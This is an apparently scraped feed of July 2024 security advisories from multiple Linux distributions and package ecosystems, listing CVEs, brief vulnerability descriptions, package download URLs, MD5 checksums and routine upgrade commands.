x86_64 15.0: ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/aaa_glibc-solibs-2.33-x86_64-7_slack15.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/glibc-2.33-x86_64-7_slack15.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/glibc-i18n-2.33-x86_64-7_slack15.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/glibc-profile-2.33-x86_64-7_slack15.0.txz Updated packages for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/aaa_glibc-solibs-2.40-i686-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/glibc-2.40-i686-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/glibc-i18n-2.40-i686-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/glibc-profile-2.40-i686-1.txz Updated packages for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/aaa_glibc-solibs-2.40-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/glibc-2.40-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/glibc-i18n-2.40-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/glibc-profile-2.40-x86_64-1.txz **MD5 signatures** Slackware 15.0 packages: 66f7ee59e3665668d791b8c4e5de48ed aaa_glibc-solibs-2.33-i586-7_slack15.0.txz 4d45eb6472c1ebb81c60eb8b3d6bf1a1 glibc-2.33-i586-7_slack15.0.txz 7a0678e346991c74368cd2f00c36bc2a glibc-i18n-2.33-i586-7_slack15.0.txz 1d69d0c0e313aa8858dde9ded66da53d glibc-profile-2.33-i586-7_slack15.0.txz Slackware x86_64 15.0 packages: 8988733b34ff060b8d21645fbcdc7865 aaa_glibc-solibs-2.33-x86_64-7_slack15.0.txz 73bacfb1b9dad7413a3f28f3569a5e31 glibc-2.33-x86_64-7_slack15.0.txz b94067e08eefe91cc6653f2d2b227c93 glibc-i18n-2.33-x86_64-7_slack15.0.txz d3233661b844b3ff85f526e2144d29f9 glibc-profile-2.33-x86_64-7_slack15.0.txz Slackware -current packages: 5e75b97b86d815f783d154c45684ee9d a/aaa_glibc-solibs-2.40-i686-1.txz 4289505bfb9560119a23d8f59878eb5e l/glibc-2.40-i686-1.txz f74f6235a46e94c480f91a0055d032ed l/glibc-i18n-2.40-i686-1.txz 1e8f0a3f3b5896bfbab3c555cb0ca373 l/glibc-profile-2.40-i686-1.txz Slackware x86_64 -current packages: 9723996a8d43c5c002efcd107e3f30bc a/aaa_glibc-solibs-2.40-x86_64-1.txz c239b1893aa82ddfe7c8f03a993bfc32 l/glibc-2.40-x86_64-1.txz 49426d6a57eae1177a51595fa7907ed5 l/glibc-i18n-2.40-x86_64-1.txz 3c23430267ab63eb71a1917b6acf942b l/glibc-profile-2.40-x86_64-1.txz **Installation instructions** Upgrade the packages as root: `# upgradepkg *glibc-*.txz`https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-205-02
23.07.2024 22:08:45slackware[SSA:2024-205-01] bind (high)New bind packages are available for Slackware 15.0 and -current to fix security issues. **Here are the details from the Slackware 15.0 ChangeLog** ```patches/packages/bind-9.18.28-i586-1_slack15.0.txz: Upgraded. Please note that we have moved to the 9.18 branch, as 9.16 is EOL. This update fixes security issues: Remove SIG(0) support from named as a countermeasure for CVE-2024-1975. qctx-zversion was not being cleared when it should have been leading to an assertion failure if it needed to be reused. An excessively large number of rrtypes per owner can slow down database query processing, so a limit has been placed on the number of rrtypes that can be stored per owner (node) in a cache or zone database. This is configured with the new "max-rrtypes-per-name" option, and defaults to 100. Excessively large rdatasets can slow down database query processing, so a limit has been placed on the number of records that can be stored per rdataset in a cache or zone database. This is configured with the new "max-records-per-type" option, and defaults to 100. Malicious DNS client that sends many queries over TCP but never reads responses can cause server to respond slowly or not respond at all for other clients. For more information, see: https://www.cve.org/CVERecord?id=CVE-2024-1975 https://www.cve.org/CVERecord?id=CVE-2024-4076 https://www.cve.org/CVERecord?id=CVE-2024-1737 https://www.cve.org/CVERecord?id=CVE-2024-0760 (* Security fix *)``` **Where to find the new packages** Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 15.0: ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/bind-9.18.28-i586-1_slack15.0.txz Updated package for Slackware x86_64 15.0: ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/bind-9.18.28-x86_64-1_slack15.0.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/bind-9.18.28-i686-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/bind-9.18.28-x86_64-1.txz **MD5 signatures** Slackware 15.0 package: 954f9cca537e723f6c4bfdbb469b4f95 bind-9.18.28-i586-1_slack15.0.txz Slackware x86_64 15.0 package: 35f81a16cb25fe6d13254d823ca400e3 bind-9.18.28-x86_64-1_slack15.0.txz Slackware -current package: bfdca4639f7dda0753bacd2aa1bbb613 n/bind-9.18.28-i686-1.txz Slackware x86_64 -current package: f8e130f5a00b026e43f92aacda745b6c n/bind-9.18.28-x86_64-1.txz **Installation instructions** Upgrade the package as root: `# upgradepkg bind-9.18.28-i586-1_slack15.0.txz` Then, restart the name server: `# /etc/rc.d/rc.bind restart`https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-205-01
23.07.2024 19:55:58ubuntu[USN-6530-2] HAProxy vulnerability (high)HAProxy could be made to expose sensitive information.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6530-2
23.07.2024 19:41:30ubuntu[USN-6911-1] Nova vulnerabilityNova would allow unintended access to files over the network.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6911-1
23.07.2024 19:26:54npm[NPM:GHSA-G3CH-RX76-35FX] vue-template-compiler vulnerable to client-side Cross-Site Scripting (XSS) (moderate)A vulnerability has been discovered in vue-template-compiler, that allows an attacker to perform XSS via prototype pollution. The attacker could change the prototype chain of some properties such as `Object.prototype.staticClass` or `Object.prototype.staticStyle` to execute arbitrary JavaScript code. Vue 2 has reached End-of-Life. This vulnerability has been patched in Vue 3.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-G3CH-RX76-35FX
23.07.2024 18:24:29ubuntu[USN-6907-1] Squid vulnerability (medium)Squid could be made to crash if it processed specially crafted characters.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6907-1
23.07.2024 17:19:48ubuntu[USN-6909-1] Bind vulnerabilities (high)Several security issues were fixed in Bind.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6909-1
23.07.2024 18:51:55npm[NPM:GHSA-8H55-Q5QQ-P685] (ReDoS) Regular Expression Denial of Service in tf2-item-format (high)## Summary Versions of `tf2-item-format` since at least `4.2.6` are vulnerable to a Regular Expression Denial of Service (ReDoS) attack when parsing crafted user input. ## Tested Versions - `5.9.13` - `5.8.10` - `5.7.0` - `5.6.17` - `4.3.5` - `4.2.6` ### v5 Upgrade package to `^5.9.14` ### v4 No patch exists. Please consult the [v4 to v5 migration guide](https://github.com/danocmx/node-tf2-item-format?tab=readme-ov-file#migrating-from-v4-to-v5) to upgrade to v5. If upgrading to v5 is not possible, fork the module repository and implement the fix detailed below. ## Impact This vulnerability can be exploited by an attacker to perform DoS attacks on any service that uses `tf2-item-format` to parse user input.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-8H55-Q5QQ-P685
23.07.2024 17:03:15ubuntu[USN-6908-1] Tomcat vulnerabilities (high)Several security issues were fixed in Tomcat.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6908-1
23.07.2024 16:28:09ubuntu[USN-6906-1] python-zipp vulnerability (medium)python-zipp could be subjected to a denial of service if certain zip files are used.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6906-1
23.07.2024 12:43:14ubuntu[USN-6898-4] Linux kernel vulnerabilities (critical)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6898-4
23.07.2024 12:12:48ubuntu[USN-6893-3] Linux kernel vulnerabilities (critical)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6893-3
23.07.2024 10:58:00ubuntu[USN-6896-5] Linux kernel vulnerabilities (critical)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6896-5
23.07.2024 03:16:09ubuntu[USN-6905-1] Rack vulnerabilities (high)Rack could be made to consume resources and cause long delays if it processed certain input.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6905-1
23.07.2024 03:00:00cisa[CISA-2024:0723] CISA Adds 2 Known Exploited Vulnerabilities to Catalog (high)CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0723
23.07.2024 03:00:00oraclelinux[ELSA-2024-4720] httpd:2.4 security update (important)httpd [2.4.37-65.0.1.1] - Replace index.html with Oracle's index page oracle_index.html [2.4.37-65.1] - Resolves: RHEL-45812 - httpd:2.4/httpd: Substitution encoding issue in mod_rewrite (CVE-2024-38474) - Resolves: RHEL-45785 - httpd:2.4/httpd: Encoding problem in mod_proxy (CVE-2024-38473) - Resolves: RHEL-45777 - httpd:2.4/httpd: Improper escaping of output in mod_rewrite (CVE-2024-38475) - Resolves: RHEL-45758 - httpd:2.4/httpd: null pointer dereference in mod_proxy (CVE-2024-38477) - Resolves: RHEL-45743 - httpd:2.4/httpd: Potential SSRF in mod_rewrite (CVE-2024-39573) mod_http2 mod_md https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4720
23.07.2024 03:00:00oraclelinux[ELSA-2024-4726] httpd security update (important)[2.4.57-11.0.1] - Replace index.html with Oracle's index page oracle_index.html. [2.4.57-11] - Resolves: RHEL-45792 - httpd: Encoding problem in mod_proxy (CVE-2024-38473) [2.4.57-9] - Resolves: RHEL-45766 - httpd: null pointer dereference in mod_proxy (CVE-2024-38477) - Resolves: RHEL-45749 - httpd: Potential SSRF in mod_rewrite (CVE-2024-39573) - Resolves: RHEL-45818 - httpd: Substitution encoding issue in mod_rewrite (CVE-2024-38474) - Resolves: RHEL-45771 - httpd: Improper escaping of output in mod_rewrite (CVE-2024-38475)https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4726
23.07.2024 03:00:00redhat[RHSA-2024:4720] httpd:2.4 security update (important)The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server. Security Fix(es): * httpd: Encoding problem in mod_proxy (CVE-2024-38473) * httpd: Substitution encoding issue in mod_rewrite (CVE-2024-38474) * httpd: Improper escaping of output in mod_rewrite (CVE-2024-38475) * httpd: NULL pointer dereference in mod_proxy (CVE-2024-38477) * httpd: Potential SSRF in mod_rewrite (CVE-2024-39573) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4720
23.07.2024 03:00:00redhat[RHSA-2024:4713] kpatch-patch security update (important)This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. Security Fix(es): * kernel: TIPC message reassembly use-after-free remote code execution vulnerability (CVE-2024-36886) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4713
23.07.2024 03:00:00redhat[RHSA-2024:4726] httpd security update (important)The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server. Security Fix(es): * httpd: Improper escaping of output in mod_rewrite (CVE-2024-38475) * httpd: Substitution encoding issue in mod_rewrite (CVE-2024-38474) * httpd: null pointer dereference in mod_proxy (CVE-2024-38477) * httpd: Potential SSRF in mod_rewrite (CVE-2024-39573) * httpd: Encoding problem in mod_proxy (CVE-2024-38473) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4726
23.07.2024 03:00:00redhat[RHSA-2024:4749] edk2 security update (moderate)EDK (Embedded Development Kit) is a project to enable UEFI support for Virtual Machines. This package contains a sample 64-bit UEFI firmware for QEMU and KVM. Security Fix(es): * EDK2: integer overflow in CreateHob() could lead to HOB OOB R/W (CVE-2022-36765) * edk2: Predictable TCP Initial Sequence Numbers (CVE-2023-45236) * edk2: Use of a Weak PseudoRandom Number Generator (CVE-2023-45237) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4749
23.07.2024 03:00:00redhat[RHSA-2024:4756] libuv security update (moderate)libuv is a multi-platform support library with a focus on asynchronous I/O. Security Fix(es): * libuv: Improper Domain Lookup that potentially leads to SSRF attacks (CVE-2024-24806) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4756
23.07.2024 03:00:00redhat[RHSA-2024:4757] libvirt security update (moderate)Kernel-based Virtual Machine (KVM) offers a full virtualization solution for Linux on numerous hardware platforms. The virt:rhel module contains packages which provide user-space components used to run virtual machines using KVM. The packages also provide APIs for managing and interacting with the virtualized systems. Security Fix(es): * libvirt: stack use-after-free in virNetClientIOEventLoop() (CVE-2024-4418) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4757
23.07.2024 03:00:00redhat[RHSA-2024:4762] runc security update (important)The runC tool is a lightweight, portable implementation of the Open Container Format (OCF) that provides container runtime. Security Fix(es): * golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (CVE-2024-1394) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4762
23.07.2024 03:00:00redhat[RHSA-2024:4766] python3 security update (low)Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems. Security Fix(es): * python: incorrect IPv4 and IPv6 private ranges (CVE-2024-4032) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4766
23.07.2024 03:00:00redhat[RHSA-2024:4774] linux-firmware security update (moderate)The linux-firmware packages contain all of the firmware files that are required by various devices to operate. Security Fix(es): * kernel: Reserved fields in guest message responses may not be zero initialized (CVE-2023-31346) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4774
23.07.2024 03:00:00redhat[RHSA-2024:4776] cups security update (moderate)The Common UNIX Printing System (CUPS) provides a portable printing layer for Linux, UNIX, and similar operating systems. Security Fix(es): * cups: Cupsd Listen arbitrary chmod 0140777 (CVE-2024-35235) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4776
23.07.2024 03:00:00redhat[RHSA-2024:4779] python3 security update (low)Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems. Security Fix(es): * python: incorrect IPv4 and IPv6 private ranges (CVE-2024-4032) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4779
23.07.2024 03:00:00redhat[RHSA-2024:4755] libreoffice security update (moderate)LibreOffice is an open source, community-developed office productivity suite. It includes key desktop applications, such as a word processor, a spreadsheet, a presentation manager, a formula editor, and a drawing program. LibreOffice replaces OpenOffice and provides a similar but enhanced and extended office suite. Security Fix(es): * libreoffice: create a document which without prompt will execute scripts built-into LibreOffice on clicking a graphic (CVE-2024-3044) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4755
23.07.2024 03:00:00redhat[RHSA-2024:4761] containernetworking-plugins security update (important)The Container Network Interface (CNI) project consists of a specification and libraries for writing plug-ins for configuring network interfaces in Linux containers, along with a number of supported plug-ins. CNI concerns itself only with network connectivity of containers and removing allocated resources when the container is deleted. Security Fix(es): * golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (CVE-2024-1394) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4761
23.07.2024 21:54:53rustsec[RUSTSEC-2024-0358] Apache Arrow Rust Object Store: AWS WebIdentityToken exposure in log filesExposure of temporary credentials in logs in Apache Arrow Rust Object Store, version 0.10.1 and earlier on all platforms using AWS WebIdentityTokens. On certain error conditions, the logs may contain the OIDC token passed to [AssumeRoleWithWebIdentity](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithWebIdentity.html). This allows someone with access to the logs to impersonate that identity, including performing their own calls to AssumeRoleWithWebIdentity, until the OIDC token expires. Typically OIDC tokens are valid for up to an hour, although this will vary depending on the issuer. Users are recommended to use a different AWS authentication mechanism, disable logging or upgrade to version 0.10.2, which fixes this issue. ## Details When using AWS WebIdentityTokens with the `object_store` crate, in the event of a failure and automatic retry, the underlying `reqwest` error, including the full URL with the credentials, potentially in the parameters, is written to the logs. Thanks to Paul Hatcherian for reporting this vulnerability.https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0358
25.07.2024 05:46:47slackware[SSA:2024-206-02] libxml2New libxml2 packages are available for Slackware 15.0 and -current to fix a security issue. **Here are the details from the Slackware 15.0 ChangeLog** ```patches/packages/libxml2-2.11.9-i586-1_slack15.0.txz: Upgraded. This update fixes a security issue: Fix XXE protection in downstream code. For more information, see: https://www.cve.org/CVERecord?id=CVE-2024-40896 (* Security fix *)``` **Where to find the new packages** Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 15.0: ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/libxml2-2.11.9-i586-1_slack15.0.txz Updated package for Slackware x86_64 15.0: ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/libxml2-2.11.9-x86_64-1_slack15.0.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libxml2-2.13.3-i686-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libxml2-2.13.3-x86_64-1.txz **MD5 signatures** Slackware 15.0 package: a52692a6f8bd22e350cd31258287dee0 libxml2-2.11.9-i586-1_slack15.0.txz Slackware x86_64 15.0 package: a585d867386e1ae2c77a136d2162ca09 libxml2-2.11.9-x86_64-1_slack15.0.txz Slackware -current package: 9a5aca640e5a4ed4fbb807e1a1749993 l/libxml2-2.13.3-i686-1.txz Slackware x86_64 -current package: 314261f48d01111c5c3651e326685462 l/libxml2-2.13.3-x86_64-1.txz **Installation instructions** Upgrade the package as root: `# upgradepkg libxml2-2.11.9-i586-1_slack15.0.txz`https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-206-02
25.07.2024 05:46:25slackware[SSA:2024-206-01] htdig (medium)New htdig packages are available for Slackware 15.0 and -current to fix a security issue. **Here are the details from the Slackware 15.0 ChangeLog** ```patches/packages/htdig-3.2.0b6-i586-10_slack15.0.txz: Rebuilt. Patch XSS vulnerability. Thanks to jayjwa. Get this out of cgi-bin. Thanks to LuckyCyborg. For more information, see: https://www.cve.org/CVERecord?id=CVE-2007-6110 (* Security fix *)``` **Where to find the new packages** Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 15.0: ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/htdig-3.2.0b6-i586-10_slack15.0.txz Updated package for Slackware x86_64 15.0: ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/htdig-3.2.0b6-x86_64-10_slack15.0.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/htdig-3.2.0b6-i686-10.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/htdig-3.2.0b6-x86_64-10.txz **MD5 signatures** Slackware 15.0 package: 70819a04ea4b36bfb9efa26a868d6860 htdig-3.2.0b6-i586-10_slack15.0.txz Slackware x86_64 15.0 package: 42c3793f0892367d1e3c827d3723c633 htdig-3.2.0b6-x86_64-10_slack15.0.txz Slackware -current package: 71cc9999ea5893b2781913f4b3c8900c n/htdig-3.2.0b6-i686-10.txz Slackware x86_64 -current package: 1cfe6808cf5c7cc0e203f009ee584e98 n/htdig-3.2.0b6-x86_64-10.txz **Installation instructions** Upgrade the package as root: `# upgradepkg htdig-3.2.0b6-i586-10_slack15.0.txz`https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-206-01
24.07.2024 23:07:52ubuntu[USN-6915-1] poppler vulnerability (high)poppler could be subjected to a denial of service if it opened a specially crafted PDF.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6915-1
24.07.2024 22:22:11ubuntu[USN-6914-1] OCS Inventory vulnerability (high)OCS Inventory was vulnerable to an authentication bypass if the selected authentication method was via CAS.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6914-1
24.07.2024 21:45:17ubuntu[USN-6913-1] phpCAS vulnerability (high)phpCAS was vulnerable to an authentication bypass.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6913-1
24.07.2024 20:15:11alpinelinux[ALPINE:CVE-2024-41110] docker vulnerability (critical)[From CVE-2024-41110] Moby is an open-source project created by Docker for software containerization. A security vulnerability has been detected in certain versions of Docker Engine, which could allow an attacker to bypass authorization plugins (AuthZ) under specific circumstances. The base likelihood of this being exploited is low. Using a specially-crafted API request, an Engine API client could make the daemon forward the request or response to an authorization plugin without the body. In certain circumstances, the authorization plugin may allow a request which it would have otherwise denied if the body had been forwarded to it. A security issue was discovered in 2018, where an attacker could bypass AuthZ plugins using a specially crafted API request. This could lead to unauthorized actions, including privilege escalation. Although this issue was fixed in Docker Engine v18.09.1 in January 2019, the fix was not carried forward to later major versions, resulting in a regression. Anyone who depends on authorization plugins that introspect the request and/or response body to make access control decisions is potentially impacted. Docker EE v19.03.x and all versions of Mirantis Container Runtime are not vulnerable. docker-ce v27.1.1 contains patches to fix the vulnerability. Patches have also been merged into the master, 19.0, 20.0, 23.0, 24.0, 25.0, 26.0, and 26.1 release branches. If one is unable to upgrade immediately, avoid using AuthZ plugins and/or restrict access to the Docker API to trusted parties, following the principle of least privilege.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-41110
24.07.2024 19:02:36maven[MAVEN:GHSA-V62G-JWJ9-RFVX] XML External Entity Reference (XXE) in the XML Format Plugin in Apache Drill (moderate)XXE in the XML Format Plugin in Apache Drill version 1.19.0 and greater allows a user to read any file on a remote file system or execute commands via a malicious XML file. Users are recommended to upgrade to version 1.21.2, which fixes this issue.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-V62G-JWJ9-RFVX
24.07.2024 17:59:49maven[MAVEN:GHSA-8GJ9-R4HV-3JJW] Apache Pinot: Unauthorized endpoint exposed sensitive information (high)Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Pinot.This issue affects Apache Pinot: from 0.1 before 1.0.0.Users are recommended to upgrade to version 1.0.0 and configure RBAC, which fixes the issue.Details: When using a request to path `/appconfigs` to the controller, it can lead to the disclosure of sensitive information such as system information (e.g. arch, os version), environment information (e.g. maxHeapSize) and Pinot configurations (e.g. zookeeper path). This issue was addressed by the Role-based Access Control https://docs.pinot.apache.org/operators/tutorials/authentication/basic-auth-access-control , so that `/appConfigs` and all other APIs can be access controlled. Only authorized users have access to it. Note the user needs to add the admin role accordingly to the RBAC guide to control access to this endpoint, and in the future version of Pinot, a default admin role is planned to be added.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8GJ9-R4HV-3JJW
24.07.2024 11:18:12ubuntu[USN-6912-1] provd vulnerability (high)provd could be made to run programs as an administrator.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6912-1
24.07.2024 11:15:03alpinelinux[ALPINE:CVE-2024-6197] curl vulnerability[From CVE-2024-6197] libcurl's ASN1 parser has this utf8asn1str() function used for parsing an ASN.1 UTF-8 string. It can detect an invalid field and return error. Unfortunately, when doing so it also invokes `free()` on a 4 byte local stack buffer. Most modern malloc implementations detect this error and immediately abort. Some however accept the input pointer and add that memory to its list of available chunks. This leads to the overwriting of nearby stack memory. The content of the overwrite is decided by the `free()` implementation; likely to be memory pointers and a set of flags. The most likely outcome of exploiting this flaw is a crash, although it cannot be ruled out that more serious results can be had in special circumstances.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-6197
24.07.2024 11:15:03alpinelinux[ALPINE:CVE-2024-6874] curl vulnerability[From CVE-2024-6874] libcurl's URL API function [curl_url_get()](https://curl.se/libcurl/c/curl_url_get.html) offers punycode conversions, to and from IDN. Asking to convert a name that is exactly 256 bytes, libcurl ends up reading outside of a stack based buffer when built to use the *macidn* IDN backend. The conversion function then fills up the provided buffer exactly - but does not null terminate the string. This flaw can lead to stack contents accidentally getting returned as part of the converted string.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-6874
24.07.2024 02:42:05 | curl | [CURL-CVE-2024-6874] macidn punycode buffer overread (low) | libcurl's URL API function [curl_url_get()](https://curl.se/libcurl/c/curl_url_get.html) offers punycode conversions, to and from IDN. Asking to convert a name that is exactly 256 bytes, libcurl ends up reading outside of a stack based buffer when built to use the *macidn* IDN backend. The conversion function then fills up the provided buffer exactly - but does not null terminate the string. This flaw can lead to stack contents accidentally getting returned as part of the converted string. | https://secdb.nttzen.cloud/security-advisory/curl/CURL-CVE-2024-6874
24.07.2024 02:42:05 | curl | [CURL-CVE-2024-6197] freeing stack buffer in utf8asn1str (medium) | libcurl's ASN1 parser has this utf8asn1str() function used for parsing an ASN.1 UTF-8 string. It can detect an invalid field and return error. Unfortunately, when doing so it also invokes `free()` on a 4 byte local stack buffer. Most modern malloc implementations detect this error and immediately abort. Some however accept the input pointer and add that memory to its list of available chunks. This leads to the overwriting of nearby stack memory. The content of the overwrite is decided by the `free()` implementation; likely to be memory pointers and a set of flags. The most likely outcome of exploiting this flaw is a crash, although it cannot be ruled out that more serious results can be had in special circumstances. | https://secdb.nttzen.cloud/security-advisory/curl/CURL-CVE-2024-6197
24.07.2024 07:36:42 | ubuntu | [USN-6906-1] python-zipp vulnerability (medium) | python-zipp could be made to crash if certain zip files are used. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6906-1
24.07.2024 03:00:00 | gentoo | [GLSA-202407-26] Dmidecode: Privilege Escalation (normal) | A vulnerability has been discovered in Dmidecode, which can lead to privilege escalation. | https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-26
24.07.2024 03:00:00 | gentoo | [GLSA-202407-27] ExifTool: Multiple vulnerabilities (normal) | Multiple vulnerabilities have been discovered in ExifTool, the worst of which could lead to arbitrary code execution. | https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-27
24.07.2024 03:00:00 | gentoo | [GLSA-202407-28] Freenet: Deanonymization Vulnerability (normal) | A vulnerability has been discovered in Freenet, which can lead to deanonymization due to path folding. | https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-28
24.07.2024 03:00:00 | oraclelinux | [ELSA-2024-4761] containernetworking-plugins security update (important)
[1:1.4.0-4]
- rebuild for CVE-2024-1394
- Resolves: RHEL-40809
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4761
24.07.2024 03:00:00 | oraclelinux | [ELSA-2024-4749] edk2 security update (moderate)
[20231122-6.0.1.el9_4.2]
- Replace upstream references [Orabug:36569119]
[20231122-6.el9_4.2]
- edk2-NetworkPkg-SECURITY-PATCH-CVE-2023-45237.patch [RHEL-40270 RHEL-40272]
- edk2-NetworkPkg-TcpDxe-SECURITY-PATCH-CVE-2023-45236.patch [RHEL-40270 RHEL-40272]
- edk2-NetworkPkg-TcpDxe-Fixed-system-stuck-on-PXE-boot-flo.patch [RHEL-40270 RHEL-40272]
- edk2-MdePkg-BaseRngLib-Add-a-smoketest-for-RDRAND-and-che.patch [RHEL-40270 RHEL-40272]
- edk2-SecurityPkg-RngDxe-add-rng-test.patch [RHEL-40270 RHEL-40272]
- edk2-OvmfPkg-wire-up-RngDxe.patch [RHEL-40270 RHEL-40272]
